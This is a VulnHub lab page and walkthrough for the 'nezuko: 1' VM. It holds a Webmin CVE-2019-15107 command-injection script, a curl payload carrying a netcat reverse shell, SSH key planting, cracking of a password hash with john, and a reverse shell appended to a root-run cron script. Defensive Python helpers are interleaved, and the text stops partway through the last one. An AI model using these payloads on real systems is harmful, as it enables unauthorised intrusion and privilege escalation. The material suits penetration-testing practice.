NEZUKO: 1——202201152003

news2024/9/20 18:25:12

About Release

  • Name: nezuko: 1
  • Date release: 21 Aug 2019
  • Author: yunaranyancat
  • Series: nezuko

Download

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network”. If you understand the risks, please download!

  • nezuko.zip (Size: 2.9 GB)
  • Download: https://drive.google.com/open?id=1fsi4WvQnvYdpHaRMfNufyGiDKckmza_Z
  • Download (Mirror): https://download.vulnhub.com/nezuko/nezuko.zip

Description

Creator : @yunaranyancat (Twitter)

Difficulty : Easy ~ Intermediate

OS Used: Ubuntu 18.04

Services : Webmin 1.920, Apache, SSH

User : root, zenitsu, nezuko

Hashes : at their home directory

File Information

  • Filename: nezuko.zip
  • File size: 2.9 GB
  • MD5: 10DBD333208D012E620242276BE2F817
  • SHA1: 7D545A6F86532EC17157104F1952364A6AEDE2A5

Virtual Machine

  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

Networking

  • DHCP service: Enabled
  • IP address: Automatically assign

Screenshots

Walkthrough

  • 21 Aug 2019 - VM Nezuko Boot2Root Writeup (yunaranyancat)

1. Information gathering

Currently scanning: 172.16.91.0/16   |   Screen View: Unique Hosts               
                                                                                  
 9 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 540                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.199   00:0c:29:18:22:fe      1      60  VMware, Inc.                   
 192.168.219.1   f2:18:98:21:29:69      2     120  Unknown vendor                 
 192.168.219.180 00:0c:29:18:22:fe      2     120  VMware, Inc.                   
 192.168.219.254 00:50:56:fb:8b:50      2     120  VMware, Inc.                   
 192.168.219.2   00:50:56:f1:66:62      2     120  VMware, Inc.                   

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ sudo netdiscover -i eth0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8646  bytes 1926100 (1.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8646  bytes 1926100 (1.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -A 192.168.219.0/24 -T 4                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:06 CST
Nmap scan report for 192.168.219.1 (192.168.219.1)
Host is up (0.0017s latency).
All 1000 scanned ports on 192.168.219.1 (192.168.219.1) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.2 (192.168.219.2)
Host is up (0.0014s latency).
All 1000 scanned ports on 192.168.219.2 (192.168.219.2) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap scan report for 192.168.219.177 (192.168.219.177)
Host is up (0.0013s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Debian 1 (protocol 2.0)
| ssh-hostkey: 
|   256 8c:8c:6e:2c:b9:f6:97:3c:5b:fc:30:eb:c5:29:0e:38 (ECDSA)
|_  256 ba:37:56:6d:cc:b1:a3:92:3a:09:c9:fb:9f:86:3e:39 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.0019s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.58 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 

┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -p- -A 192.168.219.180                                                   
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:10 CST
Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.00098s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
|   256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_  256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
13337/tcp open  ssl/http MiniServ 1.920 (Webmin httpd)
|_http-title: Login to Webmin
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on ubuntu
| Not valid before: 2019-08-20T09:28:46
|_Not valid after:  2024-08-18T09:28:46
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds
                                                                                   
┌──(pinginglab㉿pinginglab)-[~]
└─$ 
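As an added illustration (not part of this page or the VM author's material), the following script parses nmap's normal output into per-host port records and flags banners on a small watch list, so a scan like the one above can be triaged automatically. The sample text is a constructed excerpt modelled on the scan results shown; the watch-list entry for MiniServ 1.920 points at CVE-2019-15107, the issue the PoC script later in the writeup tests for.

```python
"""Parse nmap 'normal' output into structured records and flag banners of interest.

Added example for this writeup; not code from the page, the VM author, or nmap.
The sample below is a constructed excerpt modelled on the 'nmap -p- -A' output
shown above. The watch list is an assumption: extend it from your own advisory feed.
"""
import re
from dataclasses import dataclass

SAMPLE_NMAP = """\
Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.00098s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
13337/tcp open  ssl/http MiniServ 1.920 (Webmin httpd)
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.219.177 (192.168.219.177)
Host is up (0.0013s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Debian 1 (protocol 2.0)
"""

# One "Nmap scan report for <host>" line opens each host block.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Port table rows: "<port>/<proto>  <state>  <service>  <version banner>".
# Script-output rows ("|_http-title: ...") and headers never match \d+ first.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap(text):
    """Return {host: [Port, ...]} for every scan-report block in the text."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            num, proto, state, service, version = m.groups()
            hosts[current].append(Port(int(num), proto, state, service, version.strip()))
    return hosts


# Banner fragments worth a second look (assumed watch list; only the entry the
# page itself supports is listed here).
WATCH_LIST = {
    "MiniServ 1.920": "Webmin 1.920: CVE-2019-15107 (unauthenticated RCE via password_change.cgi)",
}


def flag_hosts(hosts, watch=WATCH_LIST):
    """Return [(host, port, note)] for open ports whose banner matches the watch list."""
    hits = []
    for host, ports in hosts.items():
        for p in ports:
            if p.state != "open":
                continue
            for fragment, note in watch.items():
                if fragment in p.version:
                    hits.append((host, p.number, note))
    return hits


if __name__ == "__main__":
    for host, port, note in flag_hosts(parse_nmap(SAMPLE_NMAP)):
        print(f"{host}:{port}  {note}")
```

Matching on a banner fragment is deliberately conservative: nmap's version string is the only evidence in the scan, so the output is a list of hosts to verify, not a confirmed finding.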

2. Try the exploit script

#!/bin/sh
#
# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag via an echo command, then greps the response for it. If it matches, the target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI="$1"

# Refuse to run without a target URL instead of posting to an empty host.
if [ -z "$URI" ]; then
	echo "Usage: sh $0 https://target:port" >&2
	exit 2
fi

printf 'Testing for RCE (CVE-2019-15107) on %s: ' "$URI"

# printf is used for the coloured result instead of echo: dash's echo interprets
# \033 escapes but bash's does not, so the original printed a literal "\033" under bash.
if curl -ks "$URI/password_change.cgi" -d "user=wheel&pam=&expired=2&old=id|echo $FLAG&new1=wheel&new2=wheel" -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: $URI/session_login.cgi" | grep -q "$FLAG"; then
	printf '\033[0;31mVULNERABLE!\033[0m\n'
else
	printf '\033[0;32mOK! (target is not vulnerable)\033[0m\n'
fi
#EOF

                                                                               
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ sh shell1.sh https://192.168.219.180:13337 
test
https://192.168.219.180:13337
Testing for RCE (CVE-2019-15107) on https://192.168.219.180:13337: VULNERABLE!
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 
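From the defender's side, the request the script above sends is a POST to password_change.cgi with a forged Referer and a bogus session cookie, from a client that never actually logged in. The following added example (not code from the page or from the Webmin project) shows a triage pass over Webmin access-log lines that flags exactly that pattern. It assumes miniserv.log is written in Common Log Format (Webmin's log format is configurable, so treat that as an assumption) and that a legitimate password change is preceded by a session_login.cgi request from the same client; the log lines are constructed to mirror the request the PoC makes.

```python
"""Flag password_change.cgi POSTs that were not preceded by a login from the same client.

Added example for this writeup; not code from the page or from Webmin.
Assumptions: the access log is in Common Log Format, and a genuine password
change follows a session_login.cgi request from the same source IP within a
short window. The log lines below are constructed.
"""
import re
from datetime import datetime, timedelta

# Constructed sample: one client logs in and then changes its password; a
# second client posts straight to password_change.cgi with no login at all.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2023:20:30:02 +0800] "GET /session_login.cgi HTTP/1.1" 200 2741
10.0.0.5 - - [15/Jan/2023:20:30:11 +0800] "POST /session_login.cgi HTTP/1.1" 200 1188
10.0.0.5 - - [15/Jan/2023:20:30:40 +0800] "POST /password_change.cgi HTTP/1.1" 200 977
192.168.219.177 - - [15/Jan/2023:20:34:45 +0800] "POST /password_change.cgi HTTP/1.1" 200 1203
192.168.219.177 - - [15/Jan/2023:20:39:58 +0800] "POST /password_change.cgi HTTP/1.1" 200 1203
"""

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_clf(text):
    """Yield one dict per parsable CLF line; unparsable lines are skipped."""
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
        rec["status"] = int(rec["status"])
        yield rec


def find_unauth_password_changes(text, window=timedelta(minutes=10)):
    """Return [(ip, ts)] for every POST to password_change.cgi that has no
    session_login.cgi request from the same client within `window` before it."""
    last_login = {}
    findings = []
    for rec in parse_clf(text):
        path = rec["path"].split("?", 1)[0]
        if path.endswith("/session_login.cgi"):
            last_login[rec["ip"]] = rec["ts"]
        elif rec["method"] == "POST" and path.endswith("/password_change.cgi"):
            seen = last_login.get(rec["ip"])
            if seen is None or rec["ts"] - seen > window:
                findings.append((rec["ip"], rec["ts"]))
    return findings


if __name__ == "__main__":
    for ip, ts in find_unauth_password_changes(SAMPLE_LOG):
        print(f"{ts.isoformat()}  {ip}  POST password_change.cgi without prior login")
```

The check deliberately ignores the Referer and Cookie headers, which the PoC forges; the only thing the attacker cannot fake in the server's own log is the absence of a real session_login.cgi request from their address.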

nc -e /bin/bash attack_ip port
(Author: 合天网安实验室, https://www.bilibili.com/read/cv3530863/; source: bilibili)

nc -e /bin/bash 192.168.219.177 4444

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -lnvp 4444             
listening on [any] 4444 ...
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 51698

ls
Authen-SolarisRBAC-0.1
CHANGELOG
acl-lib.pl

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)

                                       
python -c 'import pty;pty.spawn("/bin/bash")' 

id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/usr/local/webmin/acl
ls -l
total 736
pwd
/home/nezuko
tail nezuko.txt

from_zenitsu
nezuko.txt

[ASCII art omitted]

1af0941e0c4bd4564932184d47dd8bef

cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...
[ASCII art omitted]

1af0941e0c4bd4564932184d47dd8bef



cd from_zenitsu
ls
new_message_15-01-2023_17:05
new_message_15-01-2023_20:05
new_message_15-01-2023_20:10
new_message_15-01-2023_20:15
new_message_15-01-2023_20:20
new_message_15-01-2023_20:25
new_message_15-01-2023_20:30
new_message_15-01-2023_20:35
new_message_15-01-2023_20:40
new_message_15-01-2023_20:45
new_message_21-08-2019_01:13
new_message_21-08-2019_09:11
new_message_21-08-2019_09:12
new_message_21-08-2019_09:13
new_message_21-08-2019_09:40
cat new*
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 
nezuko chan, would you like to go on a date with me? 



ls
nezuko
zenitsu
cd zenitus
cd zenitsu
ls
to_nezuko
zenitsu.txt
cat zenitsu.txt
Kaminari no kokyū, Ichi no kata...., Hekireki Issen!


3f2ada6791f96b6a50a9ee43ee6b62df



sshkey

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh-keygen -t rsa    
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinginglab/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in sshkey
Your public key has been saved in sshkey.pub
The key fingerprint is:
SHA256:YyAJh37bhxAcyQPLL9V6SEPXlz2xgHrBlpJkLsD7i4o pinginglab@pinginglab
The key's randomart image is:
+---[RSA 3072]----+
| .+=++++ o.o..   |
| .o***o B o.o.   |
| .o.Bo++ o  ..   |
|  o+o*...        |
|  .o++.oS        |
|   .o.o...       |
|   . . .         |
|. . .            |
|E.               |
+----[SHA256]-----+
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ls                              
 47230.rb  'shell1 copy.sh'   shell1.sh   sshkey   sshkey.pub
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat sshkey.pub       
ssh-rsa [public key omitted] pinginglab@pinginglab

cat /home/nezuko/.ssh/authorized_keys
ssh-rsa [public key omitted] pinginglab@pinginglab


image-20230115213203287

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh -i sshkey nezuko@192.168.219.180                        
The authenticity of host '192.168.219.180 (192.168.219.180)' can't be established.
ED25519 key fingerprint is SHA256:2Ru1IBosCTKF6TvCVfZdwFwIaEjQloQOwvpfhwVTi04.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.219.180' (ED25519) to the list of known hosts.
Warning: SSH client configured for wide compatibility by kali-tweaks.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

404 packages can be updated.
189 updates are security updates.

New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ pwd
/home/nezuko
nezuko@ubuntu:~$ cd /home
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ sudo su zenitsu
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
sudo: 2 incorrect password attempts
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin

crack hash:

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txrt
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt 
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ echo  "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt
                                                                                   
                                                        
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john - zenhash.txt
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist = /usr/share/wordlists/rockyou.txt  zenhash.txt
stat: =: No such file or directory
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt 
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
meowmeow         (?)     
1g 0:00:00:00 DONE (2023-01-15 21:27) 1.030g/s 3694p/s 3694c/s 3694C/s asdf1234..fresa
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 

meowmeow

switch user:

nezuko@ubuntu:/home$ su zenitsu
Password: 
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:/home$ cd zenitsu/
zenitsu@ubuntu:~$ ls
to_nezuko  zenitsu.txt
zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls
send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
zenitsu@ubuntu:~/to_nezuko$ ls -al
total 12
drwxr-xr-x 2 zenitsu root    4096 Ogos 21  2019 .
drwxr-xr-x 4 zenitsu zenitsu 4096 Ogos 21  2019 ..
-rw-r--r-- 1 zenitsu root     150 Ogos 21  2019 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ echo  "nc -e /bin/bash 192.168.219.177 5555" >> send_message_to_nezuko.sh 
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 192.168.219.177 5555
zenitsu@ubuntu:~/to_nezuko$ 
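The two weaknesses chained above, a crypt hash sitting in world-readable /etc/passwd and a script in zenitsu's home that root evidently runs (the shell came back as uid 0), are exactly what a host audit should catch. The following is an added example, not code from the writeup or the box: it assumes root's crontab runs the script every minute (the writeup never shows the crontab) and uses constructed sample data.

```python
"""Defender-side audit for the two weaknesses chained in this writeup: a crypt hash
kept in world-readable /etc/passwd instead of /etc/shadow, and a root-run cron
script owned by a non-root user who can therefore edit it.  Sample data is constructed."""
import os
import stat
from collections import namedtuple

FileInfo = namedtuple("FileInfo", "uid mode")  # minimal stat view, usable on constructed data
SHADOWED = {"x", "*", "!", "!!"}  # shadowed or locked: nothing crackable in this field


def exposed_passwd_hashes(passwd_text):
    """Return [(user, issue)] for passwd entries whose password field leaks something.
    A healthy system keeps 'x' here and the hash in /etc/shadow (0640 root:shadow);
    on the box the zenitsu entry carried its $6$ hash directly, readable by any user."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw in SHADOWED:
            continue
        if pw == "":
            findings.append((user, "empty password field (login without a password)"))
        elif pw.startswith("$"):
            findings.append((user, "crypt hash exposed in world-readable passwd"))
        else:
            findings.append((user, "legacy password field exposed"))
    return findings


def cron_command_paths(crontab_text, system_format=False):
    """Yield (entry, path): the first absolute path in each crontab entry's command.
    system_format=True handles /etc/crontab and /etc/cron.d, whose entries carry a
    user field between the schedule and the command."""
    skip = 6 if system_format else 5
    for line in crontab_text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or "=" in parts[0]:
            continue  # blank, comment, or environment assignment such as MAILTO=
        cmd = parts[skip - 4:] if parts[0].startswith("@") else parts[skip:]
        for token in cmd:
            if token.startswith("/"):
                yield line.strip(), token
                break


def writable_by_others(info, trusted_uid=0):
    """Ways a non-root user could alter the file: wrong owner, or group/world write bits."""
    issues = []
    if info.uid != trusted_uid:
        issues.append(f"owned by uid {info.uid}, not root")
    if info.mode & stat.S_IWGRP:
        issues.append("group-writable")
    if info.mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues


def live_lookup(path):
    """Default lookup against the real filesystem; None when the path does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(st.st_uid, stat.S_IMODE(st.st_mode))


def audit_root_cron(crontab_text, lookup=live_lookup, system_format=False):
    """Return [(path, issue)] for scripts in root's cron that a non-root user can alter.
    The script and its directory are both checked: the directory owner can replace the
    script even when the file itself is root-owned."""
    findings = []
    for _entry, path in cron_command_paths(crontab_text, system_format):
        for target in (path, os.path.dirname(path)):
            info = lookup(target)
            if info is None:
                findings.append((target, "missing: whoever can create it runs code as root"))
                continue
            for issue in writable_by_others(info):
                findings.append((target, issue))
    return findings


# Constructed sample mirroring the writeup; the hash value and the schedule are placeholders.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash\n"
    "zenitsu:$6$saltsalt$CONSTRUCTED_HASH:1001:1001:,,,:/home/zenitsu:/bin/bash\n"
)
SAMPLE_CRONTAB = "* * * * * /home/zenitsu/to_nezuko/send_message_to_nezuko.sh\n"
SAMPLE_FS = {  # ownership as `ls -al` showed it: file and directory belong to zenitsu (uid 1001)
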